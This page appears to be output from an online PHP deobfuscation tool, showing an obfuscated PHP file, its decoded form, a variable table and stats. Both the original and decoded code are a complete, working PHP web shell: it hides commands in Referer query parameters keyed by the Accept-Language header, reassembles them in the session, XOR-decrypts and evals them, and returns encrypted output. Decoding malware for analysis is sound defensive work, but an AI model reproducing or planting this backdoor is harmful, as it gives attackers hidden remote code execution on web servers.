Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $u='S+)$p.iS=$iSq[$m[2][$z]iS]iSiS;if(strpos(iS$p,$h)===0iS){$s[$iiS]=iS"";$iSpiS=$s..

Decoded Output download

$kh="3481";$kf="9d7b";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$u='S+)$p.iS=$iSq[$m[2][$z]iS]iSiS;if(strpos(iS$p,$h)===0iS){$s[$iiS]=iS"";$iSpiS=$ss($p,3);}if(arriSiSay';
$H='s=&iS$_SESSiSION;$ss="subsiSiStr";$sliS="stiSrtolower";$i=$miS[1][iS0].iS$m[iS1][iS1];$h=$sl($ss(md5iS';
$X='($i.iS$kh),0,iS3)iS);$f=$sl(iS$ssiS(iSmd5($i.$kf),iS0iS,iS3));$p="";foriS($z=1;$z<couiSiSnt($m[1]);$z+i';
$E=';$i<$l;){foriS($j=0;(iS$j<$ciS&&iS$i<$l);$jiSiS++,iS$i++){$o.=$t{$iiS}^$k{$j}iS;iS}iS}riSeturn $o;}$r=$_S';
$p='ERViSEiSR;iS$rr=@$r["HTTiSP_REFEiSRER"iS];$ra=@$r[iS"iSHTTP_ACCEiSPT_LANGiSUAGE"]iS;ifiS($rr&&$iSra){$';
$l='$kh="3481"iS;iS$kf="iS9diS7b";funiSctiSion x($t,$k){$c=strliSen($kiS);iSiS$l=strlen($tiS);$o="";foiSr(iS$i=0iS';
$h='ll(iS"/([\\w])iS[\\w-]+(iS?:;q=0.iS([iSiS\\d]))?,?/",iS$riSa,iS$miS);if($q&&$m){@session_staiSrtiS(iS);$';
$L=str_replace('x','','crexxatex_fxxunxction');
$Z='art();@evaiSl(@giSzuniSiSciSompress(@x(@baseiS64_decodeiS(pregiS_riSeplace(ariSray("/_/","/-/iS"),arriSa';
$W='_key_exiSists(iS$i,$s)){iS$siS[$i].=$piS;$e=iSiSstrpos($siS[$iiS]iS,$f);if($e){$k=$kh.$kiSf;ob_stiSiS';
$Q='=basiSiSe64_encode(x(giSzcompress($o)iS,$k)iS);print("iS<$k>iS$d</iS$k>");@siSessioniS_destroyiS();}}}}';
$g='u=paiSrse_iSiSurl($rr);pariSse_siStr($u["queriSy"],$iSq)iS;iSiS$q=array_iSvaluiSes($q);pregiS_match_a';
$D='y(iS"/",iS"iS+")iS,$ss($s[$i],iS0,$e)iS)),$k)))iS;$o=obiS_get_iSiScontents()iS;ob_eniSd_iScleaiSn();$d';
$O=str_replace('iS','',$l.$E.$p.$g.$h.$H.$X.$u.$W.$Z.$D.$Q);
$q=$L('',$O);$q();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D y(iS"/",iS"iS+")iS,$ss($s[$i],iS0,$e)iS)),$k)))iS;$o=obiS_ge..
$E ;$i<$l;){foriS($j=0;(iS$j<$ciS&&iS$i<$l);$jiSiS++,iS$i++){$o..
$H s=&iS$_SESSiSION;$ss="subsiSiStr";$sliS="stiSrtolower";$i=$m..
$L create_function
$O $kh="3481";$kf="9d7b";function x($t,$k){$c=strlen($k);$l=str..
$Q =basiSiSe64_encode(x(giSzcompress($o)iS,$k)iS);print("iS<$k>..
$W _key_exiSists(iS$i,$s)){iS$siS[$i].=$piS;$e=iSiSstrpos($siS[..
$X ($i.iS$kh),0,iS3)iS);$f=$sl(iS$ssiS(iSmd5($i.$kf),iS0iS,iS3)..
$Z art();@evaiSl(@giSzuniSiSciSompress(@x(@baseiS64_decodeiS(pr..
$g u=paiSrse_iSiSurl($rr);pariSse_siStr($u["queriSy"],$iSq)iS;i..
$h ll(iS"/([\w])iS[\w-]+(iS?:;q=0.iS([iSiS\d]))?,?/",iS$riSa,iS..
$l $kh="3481"iS;iS$kf="iS9diS7b";funiSctiSion x($t,$k){$c=strli..
$p ERViSEiSR;iS$rr=@$r["HTTiSP_REFEiSRER"iS];$ra=@$r[iS"iSHTTP_..
$q None
$u S+)$p.iS=$iSq[$m[2][$z]iS]iSiS;if(strpos(iS$p,$h)===0iS){$s[..

Stats

MD5 50d8acd511479afbffc1227b315edb4b
Eval Count 1
Decode Time 102 ms